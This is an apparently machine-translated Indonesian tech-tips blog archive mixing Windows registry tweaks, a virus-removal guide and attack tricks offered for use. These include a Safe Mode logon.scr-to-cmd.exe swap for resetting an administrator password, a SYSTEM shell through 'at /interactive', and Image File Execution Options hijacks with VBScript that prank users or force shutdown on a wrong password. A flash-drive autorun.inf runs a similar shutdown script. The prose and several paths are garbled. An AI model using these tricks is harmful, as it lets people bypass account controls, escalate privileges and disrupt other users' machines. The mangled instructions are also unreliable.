Showing posts with label pemrogramman. Show all posts
Showing posts with label pemrogramman. Show all posts

Thursday, March 11, 2010

if you feel your old computer at the time of the booting process? surely you do not feel to wait longer to boot. therefore I give you the solution.

At the boot process, Windows 98 usually find WINSTART.BAT files. If the file is not found, the system takes longer to start. Therefore, look for this file in the dir C: \\ WINDOWS. If it does not exist, create a text file by right click and 'New | Textfile'. As the name write 'Winstart.bat'.

maybe that's just my post, I just do not want to post really long but the visitors and readers post I do not understand what he meant and I certainly do not want that, what I want though short and brief articles to the readers of the article but I understand and clear. may be useful for you all, if there are errors in understandable please.

Thursday, February 4, 2010




in this post I'm still around in the DOS operating system or the Command Prompt is not so familiar with DOS. This is now the subject of print files in the folder list, want to know how simple and easy, as follows:

Windows operating system does not provide facilities to print a list of files in a directory. But with a few tips you can do it. Way from the Start menu -\ Run. write command / c dir\ prn and then click OK or just press Enter.

Wednesday, January 27, 2010

on before posting this time, this site has provided tips and tricks for telling you about regedit even a lot of things - things that maybe you are not familiar with regedit. if you have experienced loss in the window user password?

maybe if your computer is in use by some users sometimes there are several user accounts with different account in a different operating system. example: administrator, Limited, and even just simply Guest. if at any point you really need one to use or change something in an operating system that you need to access the operating system using a user account with administrator or user administrator rights.

if you still remember the password you use may not be any problem but if you forget the password. This one follows a very telling way of all. sometimes it this way in all PCs berhasi will but who knows in the PC you use was not successful. the following steps:

1. Turn on your computer in Safe Mode.
2. After arriving in the user menu, select a user that is not password protected or that you remember the password.
3. After entry into the operating system, click [start]\u003e [Run] and click "CMD" and press Enter.
4. After the command prompt window open, click "C: \\ WINDOWS \\ System32" (without the "), your operating system is installed on drive C: \\ and name of the folder where Installing a 'Windows'.
5. For safety, before changing the administrator password, there is a good idea to make backups of the files with the name logon.scr. The trick is to click the "Copy logon.scr logon.bak" (without the ").
6. Next is click the command "copy cmd.exe logon.scr".
7. To change the administrator password, the dir c: \\ windows \\ system32 earlier, click command: "net user administrator 1234". with the example, the administrator user's password will be changed to 1234. Surely the new password you can change at will. In addition you can also change the password other registered users.
8. After that the screen will display the password change was successfully performed. If you've restarted your computer and try to login with the user password has changed.

The steps above is one way to change password administrator or other users in the Windows XP operating system. If you do not succeed to open the windows XP administrator's password with the steps above, there is one other shortcuts that you can do.

The way is to reset the administrator password to be empty, so we login with the administrator account without having to enter his password.

To do this, you need a tool called CHNTWP (Change NT Password), utilities may CHNTWP taken in http://home.eunet.no/pnordahl/ntpasswd/ address and you can use as a waste Besides can reset the password of each user which operating system is Windows NT-based, you also do not need to remember long-reminders password of each user.

Saturday, January 2, 2010


Right-click function is a very good way to learn some of the hidden functions of Windows. Want more? Try you start exploring the Control Panel application and find some useful techniques. And there's more command-line application in the folder Windows' System32. But, none could compare to the Registry.

Registry complete with various useful settings to improve performance, improve security holes, and even change the fundamental basis of Windows to work better. Although very sophisticated look, you still need to be careful in using it because it is not just a feature that helps but also many pitfalls.

If not careful, you are actually adding to the problem of solving it. For that, below there are 20 hacks for you to try to make your PC better. Good luck!!

1. Increase Security
Someone who does not want can easily take your data with the USB if he managed to access your PC physically. If you're using Windows XP2 or later, there is a simple way to prevent it.

Navigate to "HKLM \\ SYSTEM \\ CurrentControlSet \\ Control \\ StorageDevi cePolicies", create a DWORD value called "WriteProtect" and set the value "1". You will be able to read the USB drive, but can not move the data into it again.

2. Control UAC
Full Vista's User Account so often led to warnings that eventually turned off by the user. But, sometimes it makes them miss features that are useful as protection mode for IE. You can control it how to disable the warning for the administrator, so you do not need to interfere, but the UAC still working on the background and you can still get its features.

To do this, go to "HKLM \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Po licies \\ System \\ ConsentPromptBehaviorAdmin", and set the value to "0". To return to normal conditions, set the value to "2".

3. Change Owner

Install Windows on your PC and you'll be prompted to enter a name, which will then be stored as the registered owner (WinVer run to see this on your system). If you buy a secondhand computer, you may want to change the name of the owner with his own name.  there's no other way than with the Registry.
br\u003e Go to the "HKLM \\ SOFTWARE \\ Microsoft \\ WindowsNT \\ CurrentVers ion" and will see two sentences "RegisteredOwner" and "RegisteredOrganization". Double-click on them to change.

4. Sort the files by True
Sort the file name in Explorer can become a problem. Initial settings, he would put "File_v2.txt" before "File_v15.txt", and sequences that are not ASCII, but it looks more reasonable. But, what if "v" refers to the version number, and should "File_v15.txt" in the previous order? At this time, initial system Explorer can not work at all.

To return the ASCII sort order based on the usual, go to "HKLM \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Po licies \\ Explorer", create a DWORD value called "NoStrCmpLogical" and set the value to "1". Delete the code if you want to go back to the initial conditions of the standard Explorer.

5. Troubleshoot Startup
If Windows takes too long to start up and shut down, he probably was having an issue. To find out what was happening back in "HKLM \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Po licies \\ System", create a DWORD value called "verbosestatus" and set the value to "1". Restart your PC and Windows will tell you what is happening.

6. Organize Folder Types
Vista's explorer will intelligently choose the type of folder you based on its contents. However, this means your download folder will turn into the music folder if you downloaded some MP3. To fix this, go into the "HCU \\ Software \\ Classes \\ LocalSettings \\ Software \\ Micro soft \\ Windows \\ Shelf", delete the subkey "Bags" and create new ones at the same location.

Make a key called "AllFolders" under Bags, and other key named "Shell" at the bottom again. Then click her to open the "HCU \\ Software \\ Classes \\ LocalSettings \\ Software \\ Micro soft \\ Windows \\ Shell \\ Bags \\ AllFolders \\ Shell". Right-click on the right panel, select 'New | String Value "and call it" FolderType ". Then, double click on FolderType and set the value to "NotSpecified". You still can change the type of folder, but Vista will not change automatically. (If you need assistance, please click here)

7. Encryption Easily
Some versions of Windows allows you to encrypt files, although the process is a bit strange. You must right-click on the file, select "Properties", press the button "Advanced, check" Encrypt contents to secure data ", and press" OK "as much as 2x.

For a more simple way, go to "HKLM \\ SOFTWARE \\ Microsoft \\ Windows \\ Current \\ Version \\ E Xplorer \\ Advanced" create a DWORD called "EncryptionContextMenu" and set the value to "1". Now you simply right-click on the file and select "Encrypt".

8. Fast Folder Access
Quick access to folders bring it on the Start Menu, type "REGEDIT" in the "Run", go to "HKCR \\ Folder \\ shellex \\ ContextMenuHandlers", right-click "ContextMenuHandlers" and click "New | Key".

Type "and press [Enter]. Now, hold [Shift], right-click on a folder, and select" Pin to Start Menu ".

9. Accelerate Time copy
Vista gives a high priority for your soundcard, so you need to get a free audio of the problem no matter what your PC is a process. Because it can slow the process of copying the network.

To fix this, go to "HKLM \\ SOFTWARE \\ Microsoft \\ WindowsNT \\ CurrentVersion \\ Multimedia \\ SystemProfile". Try to set the "NetworkThrottlingIndex" became more 10 to 50 or 60 is quite effective, then reboot and test your network speed. For more information, click here.

10. Fix Listing Drive
If Explorer no longer displays your DVD drive, go to "HKLM \\ System \\ CurrentControlSet \\ Control \\ Class \\" and delete settings "UpperFilters" or "LowerFilters". These tips usually works, but sometimes can fail if the relevant application was problematic from the beginning. If the program stops working, see if there are updates, then reinstall.

11. Access to the Fast Display Settings
Just right-click on the desktop of Windows Vista is not enough to take you directly to the display settings menu. Windows 7 was prepared to fix this. But, for now you can do so by going to "HKCR \\ Directory \\ Background \\ Shell", right-click "Shell", select "New | Key" and called the "Display Settings".

Double-click "(Default)" there the right panel and enter the "Display Settings" in the Value Data box. Now, right-click "Display Settings" on the left panel, select "New | Key" again, and call this function as "command".

Double-click the Default value of new functions and enter the following text: "rundll32 shell32.dll, Control_RunDLL DESK.CPL, @ 0.3". Click "OK" and right-click on the desktop to see the option to display the new settings.

12. Live Messenger Multiple Log-In
Normally, Windows Live Messenger (WLM) only allows you to enter into only one account at a particular time. To make more than one, go to "HKLM \\ Software \\ Microsoft \\ WindowsLive \\ Messenger", create a DWORD value named "Multiple Instances" and set the value to "1". To restore to its original state, simply delete the value.

13. Clear Menu-Menu
You have to uninstall an application, but instead he left you a gift in the form of icons that are not useful. To fix this, go to "HKCR \\ *" and "HKCR \\ Directory". Dilate his panel, then select "shellex \\ ContextMenuHandlers" and see the various buttons on the bottom, which relate to orders you do not want.

On the PC, the function "HKCR \\ * \\ shellex \\ ContextMenuHandlers \\ 7-Zip" context menu related with 7-Zip, for example, to delete, click the "Delete" on the left panel. But be careful, you should delete only if it is 100% sure on the right menu.
14. Accelerate Back-Up
Features of Windows XP NTCBACKUP improve performance by maintaining a list of system files if he knows you will not be possible to make a back-up. Add the files and folders that you want yourself and get better results again.

See the list at "HKLM \\ SYSTEM \\ CurrentControlSet \\ Control \\ BackupResto re \\ FileNotToBackup".

15. Change the Default Installation Folder
Most of the default installation is a Program Files folder, but if you want to change it, go to "HKLM \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersio n", change "ProgramFilesDir" into the folder and reboot your choice

16. Changing Drive Name
Adding a memory card reader and the Explorer will often stop the computer folders that have names similar drives. ( "Removable Drive D:", "Removable Drive E:", and so on), making it difficult to distinguish.

You can handle the "HKLM \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Ex plorer". Make a button with the letter of the drive (for example "G"), and inside it create another new key named "DefaultLabel". Double-click on the entered value, give the name "CompactFlash" (or whatever you want it), and click "OK". Restart Explorer or press [F5] and see the changes. Drive G: will be read as "CompactFlash (G".

17. Wipe the Page File
Windows stores memory pages on the paging file for your work. It all sounds good, until someone managed to access your system, find the files, and even add or reduce something you do not want.

To fix this, go to "HKLM \\ SYSTEM \\ CurrentControlSet \\ Control \\ SessionMana ger \\ MemoryManagement", set the value "ClearPageFileAtShutdown" to 1 and reboot. Windows will delete all files on the page when it is turned off. It extends the duration and processes, but improve safety.

18. Crash on Cue
Blue screen crash usually bring bad news, but sometimes you may want to bring it up to test the Windows error reporting for example. Apparently Registry tricks can help you even for this one thing.

Navigate to "HKLM \\ SYSTEM \\ CurrentControlSet \\ Services \\ i8042prt \\ P arameters", create a DWORD called "CrashOnCtrlScroll" and set the value to 1. Reboot your computer, and crashes to just hold [Ctrl] right and press [Scroll Lock] twice. When finished, make sure that you immediately remove these commands.

19. Save CPU Time
A standard PC usually has several programs that want to use processor capacity at the same time, and Windows will allocate each period of CPU time a "quantum" a move to the next program. By default, this is usually very short, so the PC will be responsive, but sometimes this means that Windows will make the time to move between these processes.

The solution? You can try what Windows Server do. Set the system to use a longer quantem. Set "HKLM \\ SYSTEM \\ CurrentControlSet \\ Control \\ PriorityCon Control \\ Win32PrioritySepartion" to 16 (hex).

Quantum older means less turnover among the programs so much less time is wasted. You may notice that lag in games or video playback will be more subtle. But, if you find other problems, simply return the value to be Win32PrioritySeparation original value of 26.

20. Disable Autorun
Autorun feature of Windows is one of the potential security risk because it runs the code automatically when you connect a removable device that is in the PC. If indeed, it can be manually set it, it would be safe to turn off the feature.

In some systems, it can only be done through the Registry. Go to "HKLM \\ SOFTWARE \\ Microsoft \\ WindowsNT \\ CurrentVersion \\ IniFileMapping" and create a button named "Autorun.inf".

Friday, January 1, 2010


maybe now a lot of very dangerous viruses that cause very severe problems even to spread very quickly and very inconvenient time. W32/Smalltroj.VPCG virus is a malicious program is currently looking for more victims on the Internet at the end of this year. This new virus will block access to several security websites and other websites that have been specified by way of transfer to the IP number 209.85.225.99 which is Google's public IP.

every time users to try to access certain websites, including websites or anti-virus security, so that appears not on the website but the website wants to www.google.com.

This 9 step following to clean W32/Smalltroj.VPCG the potion has a vaksincom:
1. Turn off System Restore during the cleaning process take place.

2. Decide who will clean your computer from the network or the Internet.

3. Change the name of the file [C: \\ Windws \\ system32 \\ msvbvm60.dll] to prevent the virus active again.

4. Perform cleaning by using the Tools Windows Live CD Mini PE. This is due to some rootkit files masquerading as services and drivers difficult to stop. Please download the software at the address http://soft-rapidshare.com/2009/11/10/minipe-xt-v2k50903.html

Then boot the computer using software Mini PE Live CD. After that deleting some files parent virus by:

l Click the [Mini PE2XT]
l Click the [Programs]
l Click the [File Management]
l Click the [Windows Explorer]
l Then delete the following files:

o C: \\ Windows \\ System32
§ wmispqd.exe
§ Wmisrwt.exe
§ qxzv85.exe @
§ qxzv47.exe @
§ secupdat.dat
o C: \\ Documents and Settings \\% user% \\% xx%. exe, where xx is a random character (example: rllx.exe) with a file size of 6 kb.
o C: \\ windows \\ system32 \\ drivers
§ Kernelx86.sys
§% xx%. Sys, where xx is a random character who has a size of 40 KB (example: mojbtjlt.sys or cvxqvksf.sys)
§ Ndisvvan.sys
§ krndrv32.sys
o C: \\ Documents and Settings \\% user% \\ secupdat.dat
o C: \\ Windows \\ inf
§ Netsf.inf
§ netsf_m.inf
 
5. Delete the registry created by the virus, by using the "Avas! Registry Editor", how:

l Click the [Mini PE2XT]
l Click the [Programs]
l Click the [Registry Tools]
l Click [Avast! Registry Editor]
l If the confirmation screen appears Kelik button "Load ....."
l Kemudain delete registry: (see figure 6)

Ø HKEY_LOCAL_MACHINE \\ software \\ microsoft \\ windows \\ currentvers
     on \\ Run \\ \\ ctfmon.exe
Ø HKEY_LOCAL_MACHINE \\ system \\ ControlSet001 \\ Services \\ kernelx86
Ø HKEY_LOCAL_MACHINE \\ system \\ CurrentControlSet \\ Services \\ kernelx86
Ø HKEY_LOCAL_MACHINE \\ system \\ CurrentControlSet \\ Services \\ passthru
Ø HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ WindowsNT \\ CurrentVersion \\ Image File Execution Options \\ ctfmon.exe
Ø HKEY_LOCAL_MACHINE \\ software \\ microsoft \\ Windows NT \\ CurrentVersion \\ winlogon

ü Change the string value to be Userinit = userinit.exe,
Ø HKEY_LOCAL_MACHINE \\ SYSTEM \\ CurrentControlSet \\ Services \\ SharedAccess \\ Parameters \\ FirewallPolicy \\ DomainProfile \\ AuthorizedApplications \\ List
ü% windir% \\ system32 \\ wmispqd.exe =% system% \\ wmispqd.exe: *: enabled: UPnP Firewall
Ø HKEY_LOCAL_MACHINE \\ SYSTEM \\ CurrentControlSet \\ Services \\ SharedAccess \\ Parameters \\ FirewallPolicy \\ DomainProfile \\ AuthorizedApplications \\ List
ü% windir% \\ system32 \\ wmispqd.exe =% system% \\ wmispqd.exe: *: enabled: UPnP Firewall
Ø HKEY_LOCAL_MACHINE \\ SYSTEM \\ CurrentControlSet \\ Services \\ SharedAccess \\ Parameters \\ FirewallPolicy \\ StandardProfile \\ AuthorizedApplications \\ List
ü% windir% \\ system32 \\ wmispqd.exe =% system% \\ wmispqd.exe: *: enabled: UPnP Firewall
Ø HKEY_LOCAL_MACHINE \\ system \\ ControlSet001 \\ Services \\% xx%
Ø HKEY_LOCAL_MACHINE \\ system \\ CurrentControlSet \\ Services \\% xx%

Note:
% xx% showing random characters, this key is made to run the file. SYS which has the size of 40 KB which is in the directory [C: \\ Windows \\ system32 \\ drivers \\]

6. Restart the computer, restore the remaining registry that changed by the virus to copy the following script in notepad and then save with the name repair.inf. Execute the following manner: right-click repair.inf | click install

             [Version]

Signature = "$ Chicago $"
Provider = Vaksincom

[DefaultInstall]
AddReg = UnhookRegKey
DelReg = del

[UnhookRegKey]

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Classes \\ batfile \\ shell \\ open \\ command ,,,"""% 1 ""% * "

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Classes \\ comfile \\ shell \\ open \\ command ,,,"""% 1 ""% * "

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Classes \\ exefile \\ shell \\ open \\ command ,,,"""% 1 ""% * "

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Classes \\ piffile \\ shell \\ open \\ command ,,,"""% 1 ""% * "

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Classes \\ regfile \\ shell \\ open \\ command,,, "regedit.exe"% 1 ""

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Classes \\ scrfile \\ shell \\ open \\ command ,,,"""% 1 ""% * "

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Winlogon, Shell, 0, "Explorer.exe"

HKEY_LOCAL_MACHINE \\ software \\ microsoft \\ ole, EnableDCOM, 0, "Y"

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Security Center, AntiVirusDisableNotify, 0x00010001, 0

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Security Center, FirewallDisableNotify, 0x00010001, 0

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Security Center, AntiVirusOverride, 0x00010001, 0

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Security Center, FirewallOverride, 0x00010001, 0

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet001 \\ Control \\ LSA, restrictanonymous, 0x00010001, 0

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet002 \\ Control \\ LSA, restrictanonymous, 0x00010001, 0

HKLM, SYSTEM \\ CurrentControlSet \\ Control \\ LSA, restrictanonymous, 0x00010001, 0

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Explorer \\ Advanced \\ Folder \\ SuperHidden, CheckedValue, 0x00010001, 0

[del]

HKCU, Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ System, DisableRegistryTools

HKCU, Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ System, DisableCMD

HKCU, Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ Explorer, NoFolderOptions

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Run, ctfmon.exe

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet001 \\ Services \\ kernelx86

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet002 \\ Services \\ kernelx86

HKLM, SYSTEM \\ CurrentControlSet \\ Services \\ kernelx86

HKLM, SYSTEM \\ CurrentControlSet \\ Services \\ mojbtjlt

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet001 \\ Services \\ mojbtjlt

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet002 \\ Services \\ mojbtjlt

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet001 \\ Services \\ Passthru

HKEY_LOCAL_MACHINE \\ Software \\ Policies \\ Microsoft \\ Windows NT \\ SystemRestore

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Policies \\ Microsoft \\ Windows \\ windowsupdate, DoNotAllowXPSP2

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Policies \\ Microsoft \\ Windows \\ windowsupdate

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ ctfmon.exe

7. Delete temporary files and temporary Internet files. Please use the tools ATF-Cleaner. Download these tools in http://www.atribune.org/public-beta/ATF-Cleaner.exe addresses.

8. Restore back to the host file in Windows that has been changed by the virus. You can use tools Hoster, please download at the following address http://www.softpedia.com/progDownload/Hoster-Download-27041.html

Click the [Restore MS Hosts File], to restore the Windows hosts file.

9. For optimal cleaning and prevent re-infection, anti-virus scan with up-to-date and was able to detect this virus. You can also use Norman Malware Cleaner, please download at the following address http://www.norman.com/support/support_tools/58732/en.


plenty of people who think that a user with the highest privileges is administrator only. because the user admin is in the trust can solve almost any problem. but the assumption is wrong, because the user with the highest privileges in the window system is the user system.

I have a question for you all, how do I log into the system? (Users 100% free).
- Via the user account is still wrong really.
- Through the registry is not as well.
- Via bruteforce actually not true.
- Via the command prompt if this means that once the new 100% correct.

Just go straight to the topic of his mind:
1. open command prompt
2. Start - Run - cmd.exe - enter
3. you type the command below then you exit the command prompt program.

code: at xx: xx / interactive cmd.exe

with a code of xx: xx is that the code indicates the time when the program your computer to the command prompt run as a system. I usually fill with 1 minute after the hour now. example: 03.00 hours so now I am content with the time 03.01.

- Wait until the command prompt appears with the title c: \\ windows \\ system32 \\ svchost. but it was not a command prompt
- Then you are not a task manager (ctrl + alt + delete / del)
- Open the tab on the processor in task manager and click on "explorer.exe".
now your computer taskbar will disappear and let desktop well and do not in close task manager. because the task manager's user interface system with your user at the time.
- Back to the command prompt
- Type "explorer.exe" warning not to close the command prompt.
- Now taskbar will appear and desktop too. but it will be quite different from the previous one.

with tips and tricks this time you can access all places, all the directories, all registry keys, and they're all here all you can even access the computer without any limits, but is deliberately making the system user can not access.

to return to the previous user and tricks this tip:
- You directly to the command prompt
- Type the following command
code: tskill explorer.exe

if the first order problems that you can use this:
- Task manager
- On the first tab and then you click the new process
- Then you are content with the "explorer.exe"

if you are satisfied you can close task manager and command prompt.
hopefully useful to you all.


Wednesday, December 30, 2009

a tip and trick that is rarely used by the skill or master computer. a tip and trick manipulation this application is not paid manipulation application or free, but sort manipulation this application is running with a ms.word program command winword.exe, excel, or you run IE (internet explorer) but the road is a bad tip and very unique.

the most to the tip and the tip of this trick can be used on the window, even tip no longer is any additional applications. capital is only 99% window (30% and 70% registry script) and 1% using scripting intelligence.

manipulation tip is very well suited to some of those activities as follows:
1. admin who did not want the kind client - kind of.
2. they use the computer together (cafes, computer courses) but did not want certain programs run.
3. personal computers but is very afraid of the brain - manipulate other people or younger.
4. want be different with friends.
5. like ignorant friends or often idle
6. often try to - try

you should know that we will play with the script and the registry. which means quite dangerous if you do not follow the steps - steps from me. and you watch carefully and step by step. If you still do not understand or do not understand you should not directly apply tips and tricks below will result in enough trouble. but when it clearly and understand the tips and please continue with the next trick.

some word
every time you run the program, then the window will check or control of registry keys.

code: HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\



the subkey of the file name and not paths. subkey will be equated with the name that will run progrma. if the same, it will check the string "Debugger". and if the string is the window will run the program in accordance with the contents of the string. try you see below:

code: HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ taskmgr.exe



empty contents you see this image above. so if you run taskmgr.exe from the RUN menu in any EXE location. the program will run no matter the parth or another. but taskmgr.exe subkey contains the string "Debugger" see the picture below.

and the string value "C: \\ Program Files \\ Microsoft Office \\ Office11 \\ WinWord.exe". then each run RUN tasmgr.exe from the menu or from the other tasks that appear not manager instead ms.word.

an application:
with a very simple way as above is enough time to run a malicious intent. yagn as I explained the above, the window will check the existence of the string "debugger" and read the contents to run programs on purpose. but what would happen if the contents of the string "Debugger" in the blank? if nothing happened - what was the try despite a thousand times is not going the way malicious applications. but you do not worry about this tip and trick will not stop here it is still a long way to make our malware and good step if you know about the VBS script.

how to scare computer users:
for example there are users who want ignorant run task manager with CTRL + ALT + DEL, you try to fill the string "Debugger" with "wscript c: \\ skrip.vbs" without the quotes yes.
then you run a note and type the code below:
code: MsgBox ( "How dare you ignorant my computer! it was recorded! who have a computer then going mad !!!")

or the actual format below:
code:
MsgBox ( "message")


then save the file in "C: \\" with the name "skrip.vbs" (unless you set yourself)
now try run task manager.

Make a password to run things
If you want to install the password for the program (eg) task manager, the "Debugger" content with\u003e\u003e "wscript.exe c: \\ skrip.vbs" (without the quotation marks, too)



then type the following script in notepad.
code:


Dim s
s = InputBox("Masukkan kode untuk ngancurin komputer ini:")
If s = "PASSWORD" Then
  set wscr=CreateObject("WScript.Shell")
  wscr.RegDelete("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\debugger")
  wscr.exec("taskmgr.exe")
  wscr.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\debugger","wscript C:\skrip.vbs","REG_SZ"
Else
  Msgbox("Awas kalo coba-coba maen-maen dengan komputer ini!!!")
End IF

then save with the name "skrip.vbs" in C: \\

and IF you want to make a regedit password, live for a new key with the name "regedit" (do not say forget the place. go try to check the above)
then make a string "debugger" and fill with "wscript c: \\ skrip.vbs" (still without the quotes)
contents same as above ... but replace the "wscr.exec (taskmgr.exe)" replaced "wscr.exec (regedit.exe)"
so if password other files ...


if you want to change the password ... clay third row ... PASSWORD said that you replace like-like you is ...
WARNING! Case sensitive password!


Super Security
This time the game was still in VBScript ... a security that can barely broken ... Login PASSWORD SUPER-BAD!




Each run windows, then the application is first run and was followed NTOSKRNL winlogon and result in EXPLORER.
your evil thoughts would lead to "change the debugger to winlogon.exe" ... It's too bad ... now I give a little better: Explorer.
Essentially every time you enter a password window will be prompted by this little program. and if the wrong password, windows will Shutdown!
quite bad right.

Step by Step Procedure

1. Notepad
type the following script

code:
Dim s
s = InputBox("Masukkan kode untuk ngancurin komputer ini:")
set wscr=CreateObject("WScript.Shell")
If s = "PASSWORD" Then
  wscr.RegDelete("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\debugger")
  wscr.exec("explorer.exe")
  wscr.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\debugger","wscript C:\muncul.vbs","REG_SZ"
Else
  Msgbox("Berani ya!!! awas kamu!!!")
  wscr.exec("shutdown -s -f -t 00")
End IF


save with the name "C: \\ muncul.vbs"

2. regedit
make key HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ explorer.exe

3. string debugger
in the key HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ explorer.exe
for the string "debugger" and fill with "wscript c: \\ muncul.vbs"

4. done
please try restarting your computer and feel Khasiatnya ^ ^

Change the way the program
still remember most of the writing? jalanin the way MS Word MS Excel instead it loh ...
This time I beberin how ...

1. regedit
make key HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ winword.exe

2. string
in key winword.exe, make the string "debugger" and then fill with
excel.exe
or
"c: \\ Program Files \\ Microsoft Office \\ OFFICE11 \\ EXCEL.EXE" with quotation marks (because there are spaces. if no yes no spaces need quotes)

3. done
run the word ... which appears even excel
most evil tricks. Change the program that works with the script!
returned to the VBS mode ...
follow the step above (the word so excel). but debugger replaced so "wscript (jahil.vbs)" (without the quotes )
This script contents jahil.vbs

 code:
set wscr=CreateObject("WScript.Shell")
Msgbox("A Ghost has attacked this computer. This computer may result an invalid execution. Contact your Ghostbusters for more information.")
dim i
for i=0 to 100
   msgbox "Ayo bermain tekan enter 100x! Anda harus menekannya " & 100 - i & "x lagi"
next
msgbox "Gooooooooooooooooooood Byeeeeeeeeeeeeeeee!!!!!"
wscr.exec("c:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE")

 save with the name "C: \\ jahil.vbs" then run the word ... enjoy tapping


Tuesday, December 29, 2009



 many viruses are spread by the end of this year, there was even an expert in programming to know a virus that spreads the end of this year. This malware has changed in the hard disk image into a file which is very dangerous once the virus has even invaded the latest operating system from microsoft ie 7 window.

an expert analysis of antiviral vaksincom Indonesia has declared it has detected the circulation of a malicious program with Autorun.ATSJ name. that a virus or malware is a variant of the virus that has dominated autorun virus in Indonesia ranked the period November to December 2009. virus variants have been hidden in a file called images in the hard disk and make a duplicate which is actually a malicious program as well. even the duplicate files that are created will have an icon image attract enough attention so that users are able to deceive all users.



according to antivirus expertise that the file is malicious or virus created by the script in C via a software AutoIt version 3 and the compression with UPX program. features - traits the virus is to use the icon-sized pictures of about 353 KB, and extension. EXE and a type of "application".

a phenomenon in your computer get infected if the virus is as follows:
infect your computer when the victim, then the virus will cause two very strange process in the task manager once. processes running in task manager called Jview and Shimgvw and will appear in the task manager windows operating system. if it has run victims windows 7 operating system, the virus seems to run a function to turn off user account control feature (AUC). but the virus is not able to run on OS window 7. virus even has the main purpose of deadly a feature of the OS is windows 7 security features center. and consequently update and warning functions of the OS window will have a very serious problem at all.

some antivirus that will be killed by the virus as well as, Ansav guard, ESET (NOD32), norman security suite, and McAfee security center. even more unique is more the virus can kill a virus that runs locally on the taskmanager process or on star up, such as: Blastclnn.exe, blastclnnn.exe, newfolder.exe, and SSCVIHOST.exe. The main symptom that caused the most obvious is he has the ability to plow and duplicate all the existing image files in your hard drive. files that will be the main target of the virus files have the extension jpeg, bmp, png, and gif.

the virus will spread through a peripheral device is a USB flash drive. other than that he will spread itself through a local network if the victim computer has a share folder or share data in a local network. careful - careful with the virus that is very unique and cruel this year. My info may be useful this time. thanks.


Monday, October 19, 2009

 
Tag Technorati: {grup-tag}

before I give lessons or insights to you all about making the password in the flash, I thank you very much for you because it has been faithfully visiting my blog. but you should never tired of dwelling or to communicate in my place this very simple because I will give a very broad perspective of the technology world. I do not want to talk here because it will take a very long time if I told here, we immediately headed to the scene at once. post this time I want to share knowledge on how to make flash password without buying the software, but I will give knowledge about the script that I have learned, is as follows:
1. Open Notepad
(Here's how: Start _ All Programs_Accessories_Notepad or entered in notepaddan RUN then type Enter) and then copy and paste the following script code into notepad

on error goto 0
Dim s, quest, sd, m, winpath, fs
set sd = CreateObject ( "WScript.Shell")
set fs = CreateObject ( "Scripting.FileSystemObject")


set winpath = fs.getspecialfolder (0)
Set s = WScript.CreateObject ( "WScript.Shell")
do while my quest = ""
quest = InputBox ( "Enter a PASSWORD, if you enter the wrong password, the computer is going
http://www.alexa-com.co.cc !!!"," ShutDown")
if quest = "" then
m = MsgBox ( "Sorry you have not entered a password ...!", 0 +0 +48,"
http://www.alexa-com.co.cc ")
end if
loop
if quest = "
WRITE THE PASSWORD HERE 'then
s.run "shutdown-a"
sd.run winpath \x26 "\\ explorer.exe / e, / select," \x26 Wscript.ScriptFullname
else
s.run "shutdown-s-t 0"
end if



WRITE THE PASSWORD HERE your own locker, it is as a place of your password. Use of capital letters is very influential. I suggest using numbers that have been remembered by rote.
then save as a name with "passwordlock.vbs" without the quotes, before the save as sure select all files.
2. when you finish above.
then open Notepad again, to automatic settings after the flash is included in the computer.
copy and paste the following script code into notepad.

[Autorun]
shellexecute = wscript.exe passwordlock.vbs
action = FLASHDISK completed CODE


